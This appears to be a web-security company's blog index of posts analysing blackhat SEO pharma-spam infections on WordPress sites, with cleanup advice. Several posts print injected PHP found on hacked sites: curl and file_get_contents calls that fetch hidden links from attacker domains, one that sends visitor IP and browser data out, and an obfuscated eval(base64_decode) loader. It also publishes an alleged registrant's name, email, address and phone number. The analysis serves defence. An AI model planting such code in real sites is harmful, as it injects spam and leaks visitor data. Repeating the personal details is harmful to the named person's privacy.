Wpstats. org Spam and a Fake Advanced Search Plugin

If you are seeing hidden links in your WordPress site, it could be coming from wpstats.org. On some blackhat spam cases we are analysing, the following code was added to the theme header of the compromised site:

if(function_exists(‘curl_init’)) { $url = "http://www.wpstats.org/jquery-1.6.3.min.js"; $ch = curl_init(); $timeout = 5; curl_setopt($ch,CURLOPT_URL,$url); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout); $data = curl_exec($ch); curl_close($ch); echo "$data”; }

If you are not familiar with PHP, this code will contact www.wpstats.org/jquery-1.6.3.min.js, which will return a long list of hidden links to be included on your site (not visible on a normal browser).

Read More

Website Cross-contamination: Blackhat SEO Spam Malware

We recently posted about Website Cross-Contamination which we see quite a bit of in shared hosting environments. This post is a follow up with a nice sample of an SEO Spam infection that uses multiple sites in a shared environment to push their campaign.

We received a clean up request from a customer who was clearly infected with Blackhat SEO Spam:

Read More

Intelligent (Pharma) Spam Decoded

We are seeing a rise in the use of intelligent SPAM – a.k.a Pharma Hack – across a number of platforms. We recently found a nice injection that made us salivate, we figured you’d be just as interested

It is of no surprise to us that attackers are always looking for ways to trick us and more importantly our users. This gem of a find was no different.

SPAM = “Stupid, Pointless Annoying Message”.

SPAM, in the form of unsolicited e-mail messages, is a problem that we face every day.  Imagine sending a client a link to a newly released product, they get to the page, and BAM they’re greeted with advertisements for pharmaceutical products (Viagra / Cialis / Male Enhancers). What do you think the impact would be?
Read More

DreamHost Security Issue Prompts FTP Password Resets

Yesterday on the DreamHost Status Blog, it was announced that all shell/FTP passwords would be reset due to what looks to be a security breach that was discovered on one of the DreamHost database servers.

DreamHost Security BreachDreamHost looks to have done a great job notifying affected customers via the update page, keeping them up-to-date throught out the day until the issue was resolved. It looks like all FTP passwords were indeed reset.

We recommend that all DreamHost customers log into to their accounts and check their account status. It is encouraged that you change your account passwords, and it wouldn’t hurt to change your FTP and database passwords again just to make sure.

Read More

Funny Spammers: Any Reproduction of This Document in Part or in Whole is Strictly Prohibited

Spam is nothing new, but a recent site we were reviewing was a bit different. After a bit of analysis, we found a file called tracks.php that was generating spam with the following code on it:

<?php // Any reproduction of this document in part or in whole is strictly prohibited. For educational purposes only. 1993-2011 (c)
error_reporting(0) ;eval ( base64_decode("JGxMOXdGMWFZNHpYNmpUMWdUNmdRN2xPMG..


Read More

Mass Spam Infection From Wplinksforwork Dot Com (50k+ WordPress Sites Hacked)

Last year we spoke about the siteurlpath blackhat SEO attack that was infecting many WordPress sites with spam.

But, how many? We had no clue at the time. Today, we decided to check on Google and it seems that almost 50k (yes, fifty thousand sites) were compromised, at minimum…

How do we know this? Well, the attack consists of contacting the domain wplinksforwork.com to get a list of links to be displayed on the compromised sites. However, that domain has been down for the last few days and all the sites compromised (if they have display errors enabled), have this message in their footer:

Warning: file_get_contents(http://wplinksforwork.com/56132.. 47509328/p.php?host=… failed to open stream: php_network_getaddresses: getaddrinfo failed: Name or service not known in ..


Read More

Mass Compromise of Sites at gogvo.com – SEO Spam

A regular topic of discussion the past few months has been the basicpills link injection (a type of blackhat seo spam) on WordPress sites.

If you are not familiar with it, thousands of sites have been infected with basicpills which injects a ton of spammy pharma links all over compromised site (It infiltrates WordPress and attacks the wp-posts table).

So what’s that have to do with gogvo.com getting compromised? Well, in the past, the attackers would inject links directing to 247pharmaceutical.com or amoxilpharm.com, sometimes something else but similar. The seem to have changed tactics, now they are injecting links to an image directory, like:

Read More

Host4africa Mass Compromise

We are seeing a lot of sites hosted at host4africa.com compromised with Blackhat Spam SEO. Most of them are in the .co.za TLD (at 74.53.0.0/16 and 74.54.0.0/16) and have hidden links to generic drugs (common Pharma Spam).

When you on click on links added to the compromised sites you are redirected to a Pharma page, like this one:

The number of sites compromised is pretty large. Here are some we identified on one site:

Read More

Python: No such file or directory – Your site is likely compromised

If you run a WordPress site and you are seeing the following error at the top of your pages:

sh:  /usr/local/bin/python: No such file or directory

It means that it is likely compromised. How do we know that? We were tracking a large blackhat SEO spam campaign (targeting WordPress sites) and we noticed that for the last few days one of their link distrubution domains were broken and generating an error. So any hacked site would display that error instead of showing the spammy links.

This is the code that caused it (added to the index.php of the hacked sites):

<?php
        $url = "http://apollos.com.tw/LHRS/12/request.php?ip=".$_SERVER['REMOTE_ADDR']."&useragent=".urlencode($_SERVER['HTTP_USER_AGENT'])."&referer=".urlencode($_SERVER["HTTP_REFERER"]);
        $answer = file_get_contents($url);
        if (strpos($answer,"noredirect") === false) {
                echo $answer;
        }
?>

As you can see, it attempts to connect to apollos.com.tw to get the list of links to display. However, if you access this domain now you will get a python error instead…

Those are some other domains being used in this spam campaign:

apollos.com.tw
coolbloglinks.com
iqitiq.com
readerspot.com
tsarstvonebesnoe.ru
wat.az

If you are unsure if your site is compromised, try doing a quick scan here: http://sitecheck.sucuri.net

Links Injection on WordPress – Blackhat SEO Spam (basicpills) update

For the last few months we’ve been tracking a very large blackhat SEO spam campaign initiated by basicpills.com, and many other pharma-related domains (mostly located at 212.117.161.190 and 212.117.168.214).

The method used is very simple, where the attackers inject a single spam link on every post of the web site (generally WordPress). These are some of the links you will see in an infected site:

<a href="http://247pharmaceutical. com/">online prescription drugs without  a prescription..

<a href="http://webemed. com/">Buy  Generic  Cialis Onlin.

<a href="http://getrxpills . com/buy/levi tra.html”>lev itra 10 mg..

The really annoying part is that the domain and anchor text change on every post, making it very hard to delete and detect. These are some of the domains being used:

247pharmaceutical.com
acomplia-online-price.com
acomplia-online-price.net
amoxil-cheap.net
amoxilpharm.com
ampicillin-pharm.com
ampicillin-pharm.net
ampicillin-pills.com
ampicillinpills.com
ampicillin-pills.net
ampicillinpills.net
antibioticsordrer.com
antibiotics-shop.com
basicpills.com
buydiflucancheap.com
buyflagylcheap.com
buylasixcheap.com
buyLasixcheap.com
buylevaquincheap.com
buynolvadexcheap.com
camagracheap.com
camagracheap.net
camagra-pharm.com
camagra-pharm.net
cheappillsonline.net
cialis-online-price.com
cialis-online-price.net
cialis-pharm.com
cytotecbuyonline.com
dacompliasale.com
dlevitraonline.com
dzithromaxsbuy.com
e-pharmacy-online.com
generic-ed-pharmacy.com
getrxpills.com
great-levitra.com
healthcarexyz.com
kamagrasorder.com
levitra-online-price.net
onlineacompliacheap.com
onlineacompliacheap.net
onlinecialischeap.com
onlinecialischeap.net
onlinelevitracheap.com
onlinelevitracheap.net
onlineviagracheap.com
onlineviagracheap.net
peampicillinonline.com
rx-prices.com
sclomidbuy.com
sdoxycyclinebuy.com
softviagraonline.com
spropecia-online.com
spropecia-online.net
sviagrarbuy.com
viagra-online-price.com
viagra-online-price.net
vicialisabuy.com
webemed.com
westernunion-locations.com
women-health-shop.com
wpropecianonline.com

Some of these domains are being registered through Godaddy by:

Administrative Contact:
York, Steve york71steve@yahoo.com
6041 Pierless Ave
Sugar Hill, GA 30518
United States
7709450281 Fax —

And we would love to get them disabled.

For the site owners out there, you can check if your site has been infected by scanning it with our malware and spam scanner. It will show if these links have been added, and if you have other security issues. If your site has been hacked, we recommend changing your DB passwords immediately, and checking the permissions of your wp-config.php file.

If you need help cleaning up the mess, send us an email support@sucuri.net, or visit us over at Sucuri.

If you have any questions or comments, please let us know.